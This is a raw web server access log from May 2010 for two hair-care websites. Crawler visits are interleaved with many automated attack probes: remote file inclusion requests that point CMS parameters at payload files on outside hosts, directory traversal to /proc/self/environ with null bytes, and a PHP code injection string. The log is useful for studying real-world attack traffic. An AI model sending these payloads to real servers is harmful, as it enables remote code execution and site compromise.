91.192.168.241 - - [24/May/2010:10:40:47 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:40:48 -0700] "GET /logs/access_100412.log%20%20//index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:40:50 -0700] "GET /index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:41:00 -0700] "GET /index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:41:01 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:41:02 -0700] "GET /logs/access_100412.log%20%20//index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:41:06 -0700] "GET /index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:41:06 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:41:18 -0700] "GET /index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:41:18 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:41:18 -0700] "GET /logs/access_100412.log%20%20//index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [24/May/2010:10:42:13 -0700] "GET /logs/access_100412.log%20%20//index2.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.110.224.127 - - [24/May/2010:10:56:30 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.ecole-cooperation.fr//idste.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
66.249.65.88 - - [24/May/2010:10:58:24 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
67.195.114.238 - - [24/May/2010:10:59:29 -0700] "GET /?M=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
66.249.65.123 - - [24/May/2010:11:00:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
204.236.211.159 - - [24/May/2010:11:06:10 -0700] "GET /logs/access.log HTTP/1.1" 200 384884 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:13:59 -0700] "GET /logs/access_100215.log%20%20//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:13:59 -0700] "GET /logs//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:13:59 -0700] "GET /bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:03 -0700] "GET /bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:03 -0700] "GET /logs/access_100215.log%20%20//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:03 -0700] "GET /logs//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:04 -0700] "GET /bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:04 -0700] "GET /logs/access_100215.log%20%20//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:04 -0700] "GET /logs//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:33 -0700] "GET /bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:33 -0700] "GET /logs/access_100215.log%20%20//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:33 -0700] "GET /logs//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:46 -0700] "GET /logs//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:46 -0700] "GET /logs/access_100215.log%20%20//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:46 -0700] "GET /bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:57 -0700] "GET /bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:57 -0700] "GET /logs/access_100215.log%20%20//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:14:57 -0700] "GET /logs//bbs/delete_all.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.111.220 - - [24/May/2010:11:19:07 -0700] "GET /logs/scripts.log HTTP/1.0" 200 13853 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:22:03 -0700] "GET ////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:22:03 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:22:03 -0700] "GET /logs/access_100329.log%20%20/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:22:23 -0700] "GET /logs/access_100405.log%20%20/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:24:20 -0700] "GET /logs/access_100329.log%20%20/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:24:20 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:24:20 -0700] "GET ////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:24:39 -0700] "GET /logs/access_100405.log%20%20/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:25:14 -0700] "GET ////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:25:14 -0700] "GET /logs/access_100329.log%20%20/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:25:14 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:25:30 -0700] "GET /logs/access_100405.log%20%20/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:25:38 -0700] "GET ////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:25:38 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:25:38 -0700] "GET /logs/access_100329.log%20%20/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:26:20 -0700] "GET ////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:26:20 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:26:20 -0700] "GET /logs/access_100329.log%20%20/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [24/May/2010:11:26:29 -0700] "GET /logs/access_100405.log%20%20/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.146.194.66 - - [24/May/2010:11:35:38 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.146.194.66 - - [24/May/2010:11:36:25 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
95.110.224.127 - - [24/May/2010:11:38:15 -0700] "GET /logs/access_100405.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.ecole-cooperation.fr//idste.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.110.224.127 - - [24/May/2010:11:38:16 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.ecole-cooperation.fr//idste.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.110.224.127 - - [24/May/2010:11:38:16 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.ecole-cooperation.fr//idste.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.159.29.178 - - [24/May/2010:11:49:48 -0700] "GET /logs/access_100215.log%20%20//bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.159.29.178 - - [24/May/2010:11:49:48 -0700] "GET /logs//bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.159.29.178 - - [24/May/2010:11:49:48 -0700] "GET /bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:11:49:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14033 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
89.146.194.66 - - [24/May/2010:11:51:36 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.146.194.66 - - [24/May/2010:11:51:36 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.146.194.66 - - [24/May/2010:11:51:36 -0700] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.146.194.66 - - [24/May/2010:11:51:46 -0700] "GET /logs/access_100125.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.146.194.66 - - [24/May/2010:11:51:46 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.146.194.66 - - [24/May/2010:11:51:47 -0700] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.146.194.66 - - [24/May/2010:11:53:18 -0700] "GET /logs/access_100208.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:12:03:53 -0700] "GET /logs/access_091019.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
195.159.29.178 - - [24/May/2010:12:05:20 -0700] "GET /logs/access.log//bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.159.29.178 - - [24/May/2010:12:05:39 -0700] "GET /logs/access.log//bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.159.29.178 - - [24/May/2010:12:05:39 -0700] "GET /logs//bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.159.29.178 - - [24/May/2010:12:05:39 -0700] "GET /bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.117.165.184 - - [24/May/2010:12:23:01 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
212.117.165.184 - - [24/May/2010:12:23:01 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
67.195.111.220 - - [24/May/2010:12:30:28 -0700] "GET /?M=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:12:31:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13072 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:12:33:07 -0700] "GET /logs/access_100510.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:12:33:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:12:33:07 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:12:36:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:12:39:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=636 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:12:39:40 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:12:48:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14631 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:48:52 -0700] "GET /logs/access_100301.log%20%20/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:48:52 -0700] "GET /logs/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 5514 "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:48:52 -0700] "GET /?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:48:53 -0700] "GET /logs/access_100301.log%20%20/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:48:53 -0700] "GET /?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:48:53 -0700] "GET /logs/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 5514 "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:50:58 -0700] "GET /logs/access_100301.log/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:50:58 -0700] "GET /?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:50:58 -0700] "GET /logs/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 5514 "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:51:14 -0700] "GET /?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:51:14 -0700] "GET /logs/access_100301.log/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:51:14 -0700] "GET /logs/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 5514 "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:12:52:11 -0700] "GET /logs/access.log%20%20/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:52:11 -0700] "GET /logs/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 5514 "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:52:11 -0700] "GET /?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:52:26 -0700] "GET /?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:52:26 -0700] "GET /logs/access.log%20%20/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:52:26 -0700] "GET /logs/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 5514 "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:53:19 -0700] "GET /?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:53:19 -0700] "GET /logs/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 5514 "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:53:19 -0700] "GET /logs/access.log/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:53:55 -0700] "GET /?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:53:55 -0700] "GET /logs/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 5514 "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:12:53:55 -0700] "GET /logs/access.log/?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:12:55:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14210 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:12:57:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18786 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.222.56.62 - - [24/May/2010:13:00:35 -0700] "GET /logs/access_100426.log/include/mail.inc.php?root=%0Did.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [24/May/2010:13:00:35 -0700] "GET /include/mail.inc.php?root=%0Did.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [24/May/2010:13:00:35 -0700] "GET /logs//include/mail.inc.php?root=%0Did.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
220.73.161.132 - - [24/May/2010:13:02:26 -0700] "GET /logs//embed/day.php?path=http://reconer.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [24/May/2010:13:02:27 -0700] "GET /embed/day.php?path=http://reconer.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [24/May/2010:13:02:27 -0700] "GET /logs/access_100201.log%20%20//embed/day.php?path=http://reconer.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:13:02:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4807 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.73.161.132 - - [24/May/2010:13:02:46 -0700] "GET /logs/access_100201.log%20%20//embed/day.php?path=http://reconer.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [24/May/2010:13:02:46 -0700] "GET /embed/day.php?path=http://reconer.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [24/May/2010:13:02:46 -0700] "GET /logs//embed/day.php?path=http://reconer.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:05:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:13:07:37 -0700] "GET /logs/access_100215.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:10:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:13:10:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12646 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.201.66.45 - - [24/May/2010:13:15:24 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]" "www.freehairsecrets.com"
91.201.66.45 - - [24/May/2010:13:15:24 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]" "www.freehairsecrets.com"
213.189.224.16 - - [24/May/2010:13:15:51 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
